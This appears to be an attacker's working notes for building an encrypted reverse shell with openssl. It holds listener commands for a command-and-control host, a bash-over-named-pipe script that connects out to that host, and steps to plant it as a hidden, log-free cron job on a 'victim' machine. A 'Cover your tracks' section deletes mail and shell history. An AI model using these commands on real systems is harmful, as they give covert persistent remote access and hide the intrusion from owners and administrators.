Encrypted reverse shell


The problem is that after a while, the connection might be lost and the process is stuck there so it does not get re-initialized by the cron job. This is why we start by killing it.

Sheebang is required otherwise job control job decent shell env is missing.

We tried bringing the bash/openssl process into background but the script fails to run correctly in that situation. Anyways it’s best to keep that last rm so when ever the reverse shell fails to run (C&C is inactive), there will be no relying and strange named pipe file into /tmp/ or /var/tmp/.

Warning: we cannot simply use run-parts hourly cron jobs because it finally ends-up sending an email when the connection got interrupted. Better setup the cron job manually.

Listener (C&C)

as user

cd ~/
openssl req -x509 -newkey rsa:2048 -keyout self.key -out self.crt -days 9999 -nodes
openssl s_server -quiet -key self.key -cert self.crt -port 8443 \
        -CAfile selfy.crt -Verify 0 -verify_return_error

note the upcase V for Verify here, forces client certificate check.

you can also setup a screenrc dotfile for that purpose

screen -t "victim1" 1 $HOME/victim1


openssl req -x509 -newkey rsa:2048 -keyout selfy.key -out selfy.crt -days 9999 -nodes


nmap -p 8443 $CC

/usr/bin/pkill openssl
/bin/rm -f /var/tmp/s
/bin/mkfifo /var/tmp/s
/bin/bash -i < /var/tmp/s 2>&1 \
    | /usr/bin/openssl s_client -quiet -connect $CC:8443 \
    -cert /var/tmp/selfy.crt -key /var/tmp/selfy.key \
    -CAfile /var/tmp/self.crt -verify 0 -verify_return_error \
    > /var/tmp/s 2>/dev/null
/bin/rm -f /var/tmp/s

Note openssl’s stderr goes to null and that’s fine.

Ready to go

eventually put this as an executable watchdog

crontab -e -u THAT-USER

for testing

* * * * * /path/to/somehiddenfile

you should be able to read the output as local mail. then once switched to production, there should be no logs at all, not even a cronjob mentioned

*/5 * * * * /path/to/somehiddenfile >/dev/null 2>&1


wait for a while and you will get the shell

echo lala > /dev/stdout
echo lala > /dev/stderr

Cover your tracks

cd ~/
ls -alhtrF | tail
ls -alhF mail/
rm -rf mail/ .addressbook .pine*
grep '^From ' /var/mail/root | tail -2
history -c
rm -f .bash_history


we would need a login shell and the fact that it gets executed from a cron job hinders it. the -i argument to Bash apparently does not help. we get this at CC’s side

bash: cannot set terminal process group (3852): Inappropriate ioctl for device
bash: no job control in this shell

eventually pin client certificate using TPM